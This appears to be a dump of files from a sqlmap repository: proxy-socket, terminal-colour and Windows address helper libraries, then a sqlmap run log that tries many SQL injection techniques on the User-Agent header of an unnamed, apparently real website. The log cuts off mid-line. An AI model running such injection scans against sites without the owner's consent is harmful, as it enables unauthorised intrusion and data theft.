self.__proxy[3]:\n                # Resolve remotely\n                ipaddr = None\n                req = req + chr(0x03).encode() + chr(len(destaddr)).encode() + (destaddr if isinstance(destaddr, bytes) else destaddr.encode())\n            else:\n                # Resolve locally\n                ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))\n                req = req + chr(0x01).encode() + ipaddr\n        req = req + struct.pack(\">H\", destport)\n        self.sendall(req)\n        # Get the response\n        resp = self.__recvall(4)\n        if resp[0:1] != chr(0x05).encode():\n            self.close()\n            raise GeneralProxyError((1, _generalerrors[1]))\n        elif resp[1:2] != chr(0x00).encode():\n            # Connection failed\n            self.close()\n            if ord(resp[1:2])<=8:\n                raise Socks5Error((ord(resp[1:2]), _socks5errors[ord(resp[1:2])]))\n            else:\n                raise Socks5Error((9, _socks5errors[9]))\n        # Get the bound address/port\n        elif resp[3:4] == chr(0x01).encode():\n            boundaddr = self.__recvall(4)\n        elif resp[3:4] == chr(0x03).encode():\n            resp = resp + self.recv(1)\n            boundaddr = self.__recvall(ord(resp[4:5]))\n        else:\n            self.close()\n            raise GeneralProxyError((1,_generalerrors[1]))\n        boundport = struct.unpack(\">H\", self.__recvall(2))[0]\n        self.__proxysockname = (boundaddr, boundport)\n        if ipaddr != None:\n            self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)\n        else:\n            self.__proxypeername = (destaddr, destport)\n\n    def getproxysockname(self):\n        \"\"\"getsockname() -> address info\n        Returns the bound IP address and port number at the proxy.\n        \"\"\"\n        return self.__proxysockname\n\n    def getproxypeername(self):\n        \"\"\"getproxypeername() -> address info\n        Returns the IP and port number of the proxy.\n        \"\"\"\n        return _orgsocket.getpeername(self)\n\n    def getpeername(self):\n        \"\"\"getpeername() -> address info\n        Returns the IP address and port number of the destination\n        machine (note: getproxypeername returns the proxy)\n        \"\"\"\n        return self.__proxypeername\n\n    def __negotiatesocks4(self,destaddr,destport):\n        \"\"\"__negotiatesocks4(self,destaddr,destport)\n        Negotiates a connection through a SOCKS4 server.\n        \"\"\"\n        # Check if the destination address provided is an IP address\n        rmtrslv = False\n        try:\n            ipaddr = socket.inet_aton(destaddr)\n        except socket.error:\n            # It's a DNS name. Check where it should be resolved.\n            if self.__proxy[3]:\n                ipaddr = struct.pack(\"BBBB\", 0x00, 0x00, 0x00, 0x01)\n                rmtrslv = True\n            else:\n                ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))\n        # Construct the request packet\n        req = struct.pack(\">BBH\", 0x04, 0x01, destport) + ipaddr\n        # The username parameter is considered userid for SOCKS4\n        if self.__proxy[4] != None:\n            req = req + self.__proxy[4]\n        req = req + chr(0x00).encode()\n        # DNS name if remote resolving is required\n        # NOTE: This is actually an extension to the SOCKS4 protocol\n        # called SOCKS4A and may not be supported in all cases.\n        if rmtrslv:\n            req = req + destaddr + chr(0x00).encode()\n        self.sendall(req)\n        # Get the response from the server\n        resp = self.__recvall(8)\n        if resp[0:1] != chr(0x00).encode():\n            # Bad data\n            self.close()\n            raise GeneralProxyError((1,_generalerrors[1]))\n        if resp[1:2] != chr(0x5A).encode():\n            # Server returned an error\n            self.close()\n            if ord(resp[1:2]) in (91, 92, 93):\n                self.close()\n                raise Socks4Error((ord(resp[1:2]), _socks4errors[ord(resp[1:2]) - 90]))\n            else:\n                raise Socks4Error((94, _socks4errors[4]))\n        # Get the bound address/port\n        self.__proxysockname = (socket.inet_ntoa(resp[4:]), struct.unpack(\">H\", resp[2:4])[0])\n        if rmtrslv != None:\n            self.__proxypeername = (socket.inet_ntoa(ipaddr), destport)\n        else:\n            self.__proxypeername = (destaddr, destport)\n\n    def __negotiatehttp(self, destaddr, destport):\n        \"\"\"__negotiatehttp(self,destaddr,destport)\n        Negotiates a connection through an HTTP server.\n        \"\"\"\n        # If we need to resolve locally, we do this now\n        if not self.__proxy[3]:\n            addr = socket.gethostbyname(destaddr)\n        else:\n            addr = destaddr\n        self.sendall((\"CONNECT \" + addr + \":\" + str(destport) + \" HTTP/1.1\\r\\n\" + \"Host: \" + destaddr + \"\\r\\n\\r\\n\").encode())\n        # We read the response until we get the string \"\\r\\n\\r\\n\"\n        resp = self.recv(1)\n        while resp.find(\"\\r\\n\\r\\n\".encode()) == -1:\n            resp = resp + self.recv(1)\n        # We just need the first line to check if the connection\n        # was successful\n        statusline = resp.splitlines()[0].split(\" \".encode(), 2)\n        if statusline[0] not in (\"HTTP/1.0\".encode(), \"HTTP/1.1\".encode()):\n            self.close()\n            raise GeneralProxyError((1, _generalerrors[1]))\n        try:\n            statuscode = int(statusline[1])\n        except ValueError:\n            self.close()\n            raise GeneralProxyError((1, _generalerrors[1]))\n        if statuscode != 200:\n            self.close()\n            raise HTTPError((statuscode, statusline[2]))\n        self.__proxysockname = (\"0.0.0.0\", 0)\n        self.__proxypeername = (addr, destport)\n\n    def connect(self, destpair):\n        \"\"\"connect(self, despair)\n        Connects to the specified destination through a proxy.\n        destpar - A tuple of the IP/DNS address and the port number.\n        (identical to socket's connect).\n        To select the proxy server use setproxy().\n        \"\"\"\n        # Do a minimal input check first\n        if (not type(destpair) in (list,tuple)) or (len(destpair) < 2) or (type(destpair[0]) != type('')) or (type(destpair[1]) != int):\n            raise GeneralProxyError((5, _generalerrors[5]))\n        if self.__proxy[0] == PROXY_TYPE_SOCKS5:\n            if self.__proxy[2] != None:\n                portnum = self.__proxy[2]\n            else:\n                portnum = 1080\n            _orgsocket.connect(self, (self.__proxy[1], portnum))\n            self.__negotiatesocks5(destpair[0], destpair[1])\n        elif self.__proxy[0] == PROXY_TYPE_SOCKS4:\n            if self.__proxy[2] != None:\n                portnum = self.__proxy[2]\n            else:\n                portnum = 1080\n            _orgsocket.connect(self,(self.__proxy[1], portnum))\n            self.__negotiatesocks4(destpair[0], destpair[1])\n        elif self.__proxy[0] == PROXY_TYPE_HTTP:\n            if self.__proxy[2] != None:\n                portnum = self.__proxy[2]\n            else:\n                portnum = 8080\n            _orgsocket.connect(self,(self.__proxy[1], portnum))\n            self.__negotiatehttp(destpair[0], destpair[1])\n        elif self.__proxy[0] == None:\n            _orgsocket.connect(self, (destpair[0], destpair[1]))\n        else:\n            raise GeneralProxyError((4, _generalerrors[4]))\n\ndef create_connection(address, timeout=socket._GLOBAL_DEFAULT_TIMEOUT,\n                    source_address=None):\n    # Patched for a DNS-leakage\n    host, port = address\n    sock = None\n    try:\n        sock = socksocket(socket.AF_INET, socket.SOCK_STREAM)\n        if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:\n            sock.settimeout(timeout)\n        if source_address:\n            sock.bind(source_address)\n        sock.connect(address)\n    except socket.error:\n        if sock is not None:\n            sock.close()\n        raise\n    return sock\n"
  },
  {
    "path": "sqlmap/thirdparty/termcolor/__init__.py",
    "content": ""
  },
  {
    "path": "sqlmap/thirdparty/termcolor/termcolor.py",
    "content": "# coding: utf-8\n# Copyright (c) 2008-2011 Volvox Development Team\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n# Author: Konstantin Lepa <konstantin.lepa@gmail.com>\n\n\"\"\"ANSII Color formatting for output in terminal.\"\"\"\n\nfrom __future__ import print_function\nimport os\n\n\n__ALL__ = [ 'colored', 'cprint' ]\n\nVERSION = (1, 1, 0)\n\nATTRIBUTES = dict(\n        list(zip([\n            'bold',\n            'dark',\n            '',\n            'underline',\n            'blink',\n            '',\n            'reverse',\n            'concealed'\n            ],\n            list(range(1, 9))\n            ))\n        )\ndel ATTRIBUTES['']\n\n\nHIGHLIGHTS = dict(\n        list(zip([\n            'on_grey',\n            'on_red',\n            'on_green',\n            'on_yellow',\n            'on_blue',\n            'on_magenta',\n            'on_cyan',\n            'on_white'\n            ],\n            list(range(40, 48))\n            ))\n        )\n\n\nCOLORS = dict(\n        list(zip([\n            'grey',\n            'red',\n            'green',\n            'yellow',\n            'blue',\n            'magenta',\n            'cyan',\n            'white',\n            ],\n            list(range(30, 38))\n            ))\n        )\n\nCOLORS.update(dict((\"light%s\" % color, COLORS[color] + 60) for color in COLORS))\n\n# Reference: https://misc.flogisoft.com/bash/tip_colors_and_formatting\nCOLORS[\"lightgrey\"] = 37\nCOLORS[\"darkgrey\"] = 90\n\nRESET = '\\033[0m'\n\n\ndef colored(text, color=None, on_color=None, attrs=None):\n    \"\"\"Colorize text.\n\n    Available text colors:\n        red, green, yellow, blue, magenta, cyan, white.\n\n    Available text highlights:\n        on_red, on_green, on_yellow, on_blue, on_magenta, on_cyan, on_white.\n\n    Available attributes:\n        bold, dark, underline, blink, reverse, concealed.\n\n    Example:\n        colored('Hello, World!', 'red', 'on_grey', ['blue', 'blink'])\n        colored('Hello, World!', 'green')\n    \"\"\"\n    if os.getenv('ANSI_COLORS_DISABLED') is None:\n        fmt_str = '\\033[%dm%s'\n        if color is not None:\n            text = fmt_str % (COLORS[color], text)\n\n        if on_color is not None:\n            text = fmt_str % (HIGHLIGHTS[on_color], text)\n\n        if attrs is not None:\n            for attr in attrs:\n                text = fmt_str % (ATTRIBUTES[attr], text)\n\n        text += RESET\n    return text\n\n\ndef cprint(text, color=None, on_color=None, attrs=None, **kwargs):\n    \"\"\"Print colorize text.\n\n    It accepts arguments of print function.\n    \"\"\"\n\n    print((colored(text, color, on_color, attrs)), **kwargs)\n\n\nif __name__ == '__main__':\n    print('Current terminal type: %s' % os.getenv('TERM'))\n    print('Test basic colors:')\n    cprint('Grey color', 'grey')\n    cprint('Red color', 'red')\n    cprint('Green color', 'green')\n    cprint('Yellow color', 'yellow')\n    cprint('Blue color', 'blue')\n    cprint('Magenta color', 'magenta')\n    cprint('Cyan color', 'cyan')\n    cprint('White color', 'white')\n    print(('-' * 78))\n\n    print('Test highlights:')\n    cprint('On grey color', on_color='on_grey')\n    cprint('On red color', on_color='on_red')\n    cprint('On green color', on_color='on_green')\n    cprint('On yellow color', on_color='on_yellow')\n    cprint('On blue color', on_color='on_blue')\n    cprint('On magenta color', on_color='on_magenta')\n    cprint('On cyan color', on_color='on_cyan')\n    cprint('On white color', color='grey', on_color='on_white')\n    print('-' * 78)\n\n    print('Test attributes:')\n    cprint('Bold grey color', 'grey', attrs=['bold'])\n    cprint('Dark red color', 'red', attrs=['dark'])\n    cprint('Underline green color', 'green', attrs=['underline'])\n    cprint('Blink yellow color', 'yellow', attrs=['blink'])\n    cprint('Reversed blue color', 'blue', attrs=['reverse'])\n    cprint('Concealed Magenta color', 'magenta', attrs=['concealed'])\n    cprint('Bold underline reverse cyan color', 'cyan',\n            attrs=['bold', 'underline', 'reverse'])\n    cprint('Dark blink concealed white color', 'white',\n            attrs=['dark', 'blink', 'concealed'])\n    print(('-' * 78))\n\n    print('Test mixing:')\n    cprint('Underline red on grey color', 'red', 'on_grey',\n            ['underline'])\n    cprint('Reversed green on red color', 'green', 'on_red', ['reverse'])\n\n"
  },
  {
    "path": "sqlmap/thirdparty/wininetpton/__init__.py",
    "content": "#!/usr/bin/env python\n#\n# Copyright Ryan Vennell\n#\n# This software released into the public domain. Anyone is free to copy,\n# modify, publish, use, compile, sell, or distribute this software,\n# either in source code form or as a compiled binary, for any purpose,\n# commercial or non-commercial, and by any means.\n\npass\n"
  },
  {
    "path": "sqlmap/thirdparty/wininetpton/win_inet_pton.py",
    "content": "#!/usr/bin/env python\n# This software released into the public domain. Anyone is free to copy,\n# modify, publish, use, compile, sell, or distribute this software,\n# either in source code form or as a compiled binary, for any purpose,\n# commercial or non-commercial, and by any means.\n\nimport socket\nimport ctypes\nimport os\n\n\nclass sockaddr(ctypes.Structure):\n    _fields_ = [(\"sa_family\", ctypes.c_short),\n                (\"__pad1\", ctypes.c_ushort),\n                (\"ipv4_addr\", ctypes.c_byte * 4),\n                (\"ipv6_addr\", ctypes.c_byte * 16),\n                (\"__pad2\", ctypes.c_ulong)]\n\nif hasattr(ctypes, 'windll'):\n    WSAStringToAddressA = ctypes.windll.ws2_32.WSAStringToAddressA\n    WSAAddressToStringA = ctypes.windll.ws2_32.WSAAddressToStringA\nelse:\n    def not_windows():\n        raise SystemError(\n            \"Invalid platform. ctypes.windll must be available.\"\n        )\n    WSAStringToAddressA = not_windows\n    WSAAddressToStringA = not_windows\n\n\ndef inet_pton(address_family, ip_string):\n    addr = sockaddr()\n    addr.sa_family = address_family\n    addr_size = ctypes.c_int(ctypes.sizeof(addr))\n\n    if WSAStringToAddressA(\n            ip_string,\n            address_family,\n            None,\n            ctypes.byref(addr),\n            ctypes.byref(addr_size)\n    ) != 0:\n        raise socket.error(ctypes.FormatError())\n\n    if address_family == socket.AF_INET:\n        return ctypes.string_at(addr.ipv4_addr, 4)\n    if address_family == socket.AF_INET6:\n        return ctypes.string_at(addr.ipv6_addr, 16)\n\n    raise socket.error('unknown address family')\n\n\ndef inet_ntop(address_family, packed_ip):\n    addr = sockaddr()\n    addr.sa_family = address_family\n    addr_size = ctypes.c_int(ctypes.sizeof(addr))\n    ip_string = ctypes.create_string_buffer(128)\n    ip_string_size = ctypes.c_int(ctypes.sizeof(ip_string))\n\n    if address_family == socket.AF_INET:\n        if len(packed_ip) != ctypes.sizeof(addr.ipv4_addr):\n            raise socket.error('packed IP wrong length for inet_ntoa')\n        ctypes.memmove(addr.ipv4_addr, packed_ip, 4)\n    elif address_family == socket.AF_INET6:\n        if len(packed_ip) != ctypes.sizeof(addr.ipv6_addr):\n            raise socket.error('packed IP wrong length for inet_ntoa')\n        ctypes.memmove(addr.ipv6_addr, packed_ip, 16)\n    else:\n        raise socket.error('unknown address family')\n\n    if WSAAddressToStringA(\n            ctypes.byref(addr),\n            addr_size,\n            None,\n            ip_string,\n            ctypes.byref(ip_string_size)\n    ) != 0:\n        raise socket.error(ctypes.FormatError())\n\n    return ip_string[:ip_string_size.value - 1]\n\n# Adding our two functions to the socket library\nif os.name == 'nt':\n    socket.inet_pton = inet_pton\n    socket.inet_ntop = inet_ntop\n"
  },
  {
    "path": "sqlmap/whitePagesSql.txt",
    "content": "        ___\n       __H__\n ___ ___[,]_____ ___ ___  {1.6.9.3#dev}\n|_ -| . [']     | .'| . |\n|___|_  [(]_|_|_|__,|  _|\n      |_|V...       |_|   https://sqlmap.org\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 19:12:23 /2022-10-03/\n\n[19:12:23] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'\ndo you want to try URI injections in the target URL itself? [Y/n/q] [19:12:31] [INFO] testing connection to the target URL\n[19:12:31] [WARNING] potential permission problems detected ('Access denied')\n[19:12:31] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests\nyou have not declared cookie(s), while server wants to set its own ('__cf_bm=wBmLn1uMqU2...j5NopDV5nE='). Do you want to use those [Y/n] [19:12:36] [INFO] testing if the target URL content is stable\n[19:12:36] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'\nhow do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] [19:12:40] [INFO] testing if parameter 'User-Agent' is dynamic\n[19:12:41] [INFO] parameter 'User-Agent' appears to be dynamic\n[19:12:41] [WARNING] heuristic (basic) test shows that parameter 'User-Agent' might not be injectable\n[19:12:41] [INFO] testing for SQL injection on parameter 'User-Agent'\n[19:12:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[19:12:50] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'\n[19:12:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'\n[19:13:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'\n[19:13:08] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'\n[19:13:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'\n[19:13:15] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'\n[19:13:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'\n[19:13:22] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'\n[19:13:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'\n[19:13:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'\n[19:13:34] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'\n[19:13:39] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'\n[19:13:45] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'\n[19:13:51] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'\n[19:14:01] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'\n[19:14:08] [INFO] testing 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)'\n[19:14:19] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'\n[19:14:25] [INFO] testing 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'\n[19:14:35] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'\n[19:14:36] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace'\n[19:14:36] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace'\n[19:14:36] [INFO] testing 'Oracle boolean-based blind - Parameter replace'\n[19:14:36] [INFO] testing 'Informix boolean-based blind - Parameter replace'\n[19:14:37] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace'\n[19:14:37] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'\n[19:14:37] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'\n[19:14:38] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'\n[19:14:38] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'\n[19:14:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'\n[19:14:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'\n[19:14:40] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'\n[19:14:40] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'\n[19:14:40] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'\n[19:14:41] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'\n[19:14:41] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'\n[19:14:47] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'\n[19:14:50] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)'\n[19:14:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[19:14:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[19:14:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'\n[19:15:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'\n[19:15:05] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'\n[19:15:07] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'\n[19:15:10] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[19:15:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'\n[19:15:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'\n[19:15:19] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'\n[19:15:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'\n[19:15:25] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'\n[19:15:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'\n[19:15:31] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)'\n[19:15:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'\n[19:15:37] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)'\n[19:15:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'\n[19:15:43] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'\n[19:15:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'\n[19:15:49] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'\n[19:15:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'\n[19:15:55] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'\n[19:15:58] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'\n[19:16:01] [INFO] testing 'MonetDB AND error-based - WHERE or HAVING clause'\n[19:16:04] [INFO] testing 'Vertica AND error-based - WHERE or HAVING clause'\n[19:16:07] [INFO] testing 'IBM DB2 AND error-based - WHERE or HAVING clause'\n[19:16:09] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'\n[19:16:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'\n[19:16:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'\n[19:16:12] [INFO] testing 'PostgreSQL error-based - Parameter replace'\n[19:16:12] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'\n[19:16:13] [INFO] testing 'Oracle error-based - Parameter replace'\n[19:16:13] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'\n[19:16:13] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'\n[19:16:13] [INFO] testing 'PostgreSQL error-based - ORDER BY, GROUP BY clause'\n[19:16:14] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'\n[19:16:15] [INFO] testing 'Generic inline queries'\n[19:16:15] [INFO] testing 'MySQL inline queries'\n[19:16:16] [INFO] testing 'PostgreSQL inline queries'\n[19:16:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'\n[19:16:16] [INFO] testing 'Oracle inline queries'\n[19:16:16] [INFO] testing 'SQLite inline queries'\n[19:16:16] [INFO] testing 'Firebird inline queries'\n[19:16:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\n[19:16:18] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\n[19:16:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\n[19:16:22] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'\n[19:16:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'\n[19:16:25] [INFO] testing 'PostgreSQL stacked queries (heavy query - comment)'\n[19:16:27] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc - comment)'\n[19:16:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'\n[19:16:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'\n[19:16:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'\n[19:16:33] [INFO] testing 'Oracle stacked queries (heavy query - comment)'\n[19:16:34] [INFO] testing 'IBM DB2 stacked queries (heavy query - comment)'\n[19:16:36] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'\n[19:16:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[19:16:40] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'\n[19:16:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'\n[19:16:46] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'\n[19:16:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'\n[19:16:50] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'\n[19:16:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'\n[19:16:53] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'\n[19:16:55] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'\n[19:16:58] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'\n[19:17:00] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'\n[19:17:03] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'\n[19:17:06] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'\n[19:17:09] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'\n[19:17:12] [INFO] testing 'MySQL AND time-based blind (ELT)'\n[19:17:15] [INFO] testing 'MySQL OR time-based blind (ELT)'\n[19:17:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'\n[19:17:21] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'\n[19:17:23] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'\n[19:17:26] [INFO] testing 'PostgreSQL OR time-based blind (heavy query)'\n[19:17:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'\n[19:17:31] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'\n[19:17:34] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'\n[19:17:37] [INFO] testing 'Oracle AND time-based blind'\n[19:17:40] [INFO] testing 'Oracle OR time-based blind'\n[19:17:45] [INFO] testing 'Oracle AND time-based blind (heavy query)'\n[19:17:50] [INFO] testing 'Oracle OR time-based blind (heavy query)'\n[19:17:53] [INFO] testing 'IBM DB2 AND time-based blind (heavy query)'\n[19:17:55] [INFO] testing 'IBM DB2 OR time-based blind (heavy query)'\n[19:17:58] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'\n[19:18:01] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'\n[19:18:04] [INFO] testing 'Informix AND time-based blind (heavy query)'\n[19:18:06] [INFO] testing 'Informix OR time-based blind (heavy query)'\n[19:18:09] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'\n[19:18:12] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'\n[19:18:12] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'\n[19:18:12] [INFO] testing 'PostgreSQL > 8.1 time-based blind - Parameter replace'\n[19:18:13] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)'\n[19:18:13] [INFO] testing 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)'\n[19:18:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'\n[19:18:13] [INFO] testing 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause'\n[19:18:13] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)'\n[19:18:14] [INFO] testing 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)'\nit is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] [19:32:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'\n[19:33:01] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'\n[19:33:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'\n[19:33:12] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'\n[19:33:17] [WARNING] 